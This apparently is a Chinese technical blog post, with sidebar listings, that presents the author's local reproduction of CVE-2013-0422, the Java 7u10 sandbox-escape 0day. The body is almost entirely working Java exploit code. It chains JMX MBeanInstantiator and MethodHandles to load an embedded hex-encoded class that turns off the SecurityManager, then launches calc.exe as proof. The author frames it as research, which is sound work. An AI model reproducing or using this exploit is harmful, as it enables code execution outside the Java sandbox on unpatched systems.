- 浏览: 623789 次
- 性别:
- 来自: 西安
文章分类
最新评论
-
d1438138:
[img][/img]
google api 的一些神奇使用 -
waykingeye:
[i][b][u]引用[list]
[*][img][url] ...
No result defined for action and result input -
tss0823:
...
No result defined for action and result input -
yahier:
有什么办法能够捕捉,然后给出自定义的提示呢
No result defined for action and result input -
chen_lian:
恩恩 按照上面的代码测试一下觉得很对
java创建目录
0x01 这个是这两天爆出来的,我构建了一个本地测试代码,主要用来研究,测试方法,直接跑就可以看输出就可以看懂了,具体分析代码见后文
0x02 package test;
/* Java 0day 1.7.0_10 decrypted source Originaly placed on https://damagelab.org/index.php?showtopic=23719&st=0 From Russia with love. */ import java.io.IOException; import java.lang.invoke.MethodHandle; import java.lang.invoke.MethodHandles; import java.lang.invoke.MethodType; import java.security.Permission; import java.security.PermissionCollection; import java.security.Policy; import java.security.ProtectionDomain; import java.util.Enumeration; import com.sun.jmx.mbeanserver.JmxMBeanServer; import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder; import com.sun.jmx.mbeanserver.MBeanInstantiator; public class Test { void checkPermission() { ProtectionDomain domain = this.getClass().getProtectionDomain(); PermissionCollection pcoll = Policy.getPolicy().getPermissions(domain); Enumeration e = pcoll.elements(); int i = 0; for (; e.hasMoreElements();) { Permission p = (Permission) e.nextElement(); System.out.println(i + ": " + p); i++; } System.out.println("the num:" + i); } void alert() throws IOException { try { Runtime.getRuntime().exec("calc.exe"); } catch (IOException e) { // TODO Auto-generated catch block e.printStackTrace(); throw e; } } public static void main(String args[]) { try { System.out.println("1.SecurityManager 开启前测试"); Test test = new Test(); // test.checkPermission(); try { test.alert(); System.out.println("2.成功执行 exec"); } catch (SecurityException e) { System.out.println("2.you have no permission to exec"); } System.out.println("3.开启SecurityManager"); System.setSecurityManager(new SecurityManager()); System.out.println("4.SecurityManager 开启后测试"); try { test.alert(); System.out.println("5.成功执行 exec"); } catch (SecurityException e) { System.out.println("5.you have no permission to exec"); } byte[] arrayOfByte = hex2Byte(ByteArrayWithSecOff); JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder(); JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer) localJmxMBeanServerBuilder .newMBeanServer("", null, null); MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer .getMBeanInstantiator(); ClassLoader a = null; Class localClass1 = localMBeanInstantiator.findClass( "sun.org.mozilla.javascript.internal.Context", a); Class localClass2 = localMBeanInstantiator.findClass( "sun.org.mozilla.javascript.internal.GeneratedClassLoader", a); MethodHandles.Lookup localLookup = MethodHandles.publicLookup(); MethodType localMethodType1 = MethodType.methodType( MethodHandle.class, Class.class, new Class[] { MethodType.class }); MethodHandle localMethodHandle1 = localLookup.findVirtual( MethodHandles.Lookup.class, "findConstructor", localMethodType1); MethodType localMethodType2 = MethodType.methodType(Void.TYPE); MethodHandle localMethodHandle2 = (MethodHandle) localMethodHandle1 .invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 }); Object localObject1 = localMethodHandle2 .invokeWithArguments(new Object[0]); MethodType localMethodType3 = MethodType.methodType( MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class }); MethodHandle localMethodHandle3 = localLookup .findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3); MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class); MethodHandle localMethodHandle4; localMethodHandle4 = (MethodHandle) localMethodHandle3 .invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 }); Object localObject2 = localMethodHandle4 .invokeWithArguments(new Object[] { localObject1, null }); MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class }); MethodHandle localMethodHandle5 = (MethodHandle) localMethodHandle3 .invokeWithArguments(new Object[] { localLookup, localClass2, "defineClass", localMethodType5 }); Class localClass3 = (Class) localMethodHandle5 .invokeWithArguments(new Object[] { localObject2, null, arrayOfByte }); localClass3.newInstance(); System.out.println("6.CVE-2013-0422执行后"); try { test.alert(); System.out.println("7.成功执行 exec"); } catch (SecurityException e) { System.out.println("7.you have no permission to exec"); } } catch (Throwable e1) { // TODO Auto-generated catch block e1.printStackTrace(); } } public static byte[] hex2Byte(String paramString) { byte[] arrayOfByte = new byte[paramString.length() / 2]; for (int i = 0; i < arrayOfByte.length; i++) { arrayOfByte[i] = (byte) Integer.parseInt( paramString.substring(2 * i, 2 * i + 2), 16); } return arrayOfByte; } public static String ByteArrayWithSecOff = "CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F07002001" + "00063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C6501" + "00124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F4578" + "63657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F" + "07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F757263" + "6546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F" + "457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A65637401000142" + "0100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E41637469" + "6F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F" + "50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C6567656445" + "7863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176" + "612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A" + "6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000" + "020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100" + "040009000C00030003000B000000120004000000080004000B0009000C000D000D000C0000001600" + "02000D0000000D000E00010000000E000F001000000011000000100002FF000C0001070012000107" + "0013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B0000000" + "02000B0000000A00020000001000040011000C0000000C00010000000C000F001000000001001600" + "0000020017"; }
发表评论
-
metasploit 图形化界面和自动化exploit脚本
2013-10-21 16:25 76600x01 最新版的metasploit没了图形化界面, ... -
APKTool签名的一个问题
2013-10-14 21:19 24570x01 昨天写了反编译,今天就写下签名的问题 0 ... -
APKTool打包的一个小问题
2013-10-13 20:23 247520x01,又开始写blog了,好久没有网络了,最近终于可以开 ... -
struts2远程执行漏洞学习(四)
2013-05-23 00:12 22220x01 最近又有了一个新的struts2漏洞,http:/ ... -
纯转一篇关于方法句柄的,对理解很多java poc帮助很大
2013-04-19 15:16 4234http://book.2cto.com/20130 ... -
CVE-2013-1493 学习
2013-03-25 16:06 28400x01 这个又是一个java CVE,效果前几个一样, ... -
myeclipse崩溃多处理的一个小窍门
2013-01-15 20:23 30990x01 如果大家用了myeclipse10以上版本,忽然间 ... -
CVE-2013-0422 分析2
2013-01-11 23:47 32960x01 http://wcf1987.iteye.c ... -
CVE 2012 0507 分析
2012-12-17 16:00 35170x01 https://github.com/wche ... -
android 无权限 伪造短信
2012-11-06 09:15 35380x01 这个有是大名鼎鼎的蒋教授发现的,原理简单,有点意思 ... -
A new way to hack android app info
2012-11-06 01:04 1610最近新研究了一种android攻击手段,blog发到团队那里的 ... -
一次被黑追凶(未完待续)
2012-10-15 19:52 24200x01,某天师妹告诉我们某台服务器疑似被人干掉了,我果断远程 ... -
<找工作 十一>生产者消费者 组赛队列
2012-09-25 17:39 1478用阻塞队列实现 import java.util.co ... -
<找工作 十>生产者 消费者模型
2012-09-25 16:54 1102今天被问了个这个问 ... -
<找工作 九> 字符串全排列问题
2012-09-23 22:01 1344public class StringTest { ... -
<找工作 七>leetcode Add Two Numbers
2012-09-13 22:24 3095Add Two Numbers 链表相加 p ... -
<找工作 六>leetcode Median of Two Sorted Arrays
2012-09-13 21:25 3202http://www.leetcode.com/onlinej ... -
python 反编译 pyc 一些心得
2012-09-06 10:59 537240x01 , 现在用python的人也多了起来,代码安全始终是 ... -
关于web渗透中得一些记录
2012-08-24 23:31 35571. 当得到linux root shell时 ... -
mail xss
2012-08-11 21:57 16581 最近迷上了xss,感觉各种飘逸,特别是http://www ...
相关推荐
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835, CVE-2011-0838, CVE-2011-0848, CVE-2011-0870, CVE-2011-0876, CVE-2011-0879, CVE-2011-0880, CVE-2011-2230, CVE-2011-2231, CVE-2011...
23.CVE-2013-1504 24.CVE-2013-2390 25.CVE-2017-3506 26.CVE-2017-1181 27.CVE-2016-3445 28.CVE-2016-3510 29.CVE-2016-3586 30.CVE-2016-5531 31.CVE-2015-7501 32.CVE-2016-5488 33.CVE-2016-3505 34.CVE-2016-...
利用CVE-2013-2251漏洞获取服务器的webshell,从而黑入服务器
CVE-2013-6117 $ ./CVE-2013-6117 -hOptions: -h, --help display help information -f, --filename File containing list of IP addresses -t, --target Target IP -n, --threads No of concurrent threads ...
Androidroot源码利用CVE-2013-6282漏洞.zip,太多无法一一验证是否可用,程序如果跑不起来需要自调,部分代码功能进行参考学习。
自己总结出来的一个脚本,虽然是利用,但是工具是可以用。系统漏洞脚本
CVE-2013-6282是一个漏洞编号,该漏洞属于Linux内核级别的漏洞,在android 2.x至4.3之前的版本中同样存在, 可以用于系统提权,获得root权限,属于Linux系统API缺陷。 利用该漏洞,开发Android root程序。
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。...
weblogic10.36 CVE-2018-2893补丁文件 最新补丁文件,修复 WebLogic(CVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞...
通过升级openssh到OpenSSH8.4 修复openssh低版本的漏洞 openssh8.4需要的 openssl-1.1.1g, openssh-8.4p1,zlib-1.2.11
1.上传并解压:Centos7-openssh补丁包(最新fix CVE-2021-41617 #2008884).zip 2.到服务器对应的解压目录 执行命令安装 : rpm -Fvh openssh-* 3.安装完成后执行命令查看修复情况: rpm -qa openssh --changelog | ...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
-----------------------------...有关于CVE-2019-2725漏洞信息涉及版本, 代码执行危害请百度查询 Cve-2019-2725 升级安装开始 1,cache_dir 这个目录 需要 自己建立 mkdir /Oracle/Middleware/utils/bsu/cache_dir
# CVE-2020-0688 Exchange RCE 前提: 已知一个域用户 影响版本: -Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 -Microsoft Exchange Server 2013 Cumulative Update 23 -Microsoft ...
CVE-2017-12615漏洞利用工具;CVE-2017-12615漏洞利用工具;
CVE-2017-8759-Exploit-sample-master,漏洞示例代码。
CVE-2012-1675 补丁 oracle 11.2.0.1
最新版weblogic漏洞cve-2018-2893对应的poc python cve-2018-2893-poc.py [ip] [post]
打包的weblogic-CVE-2018-3191 exp配合ysoserial获取shell权限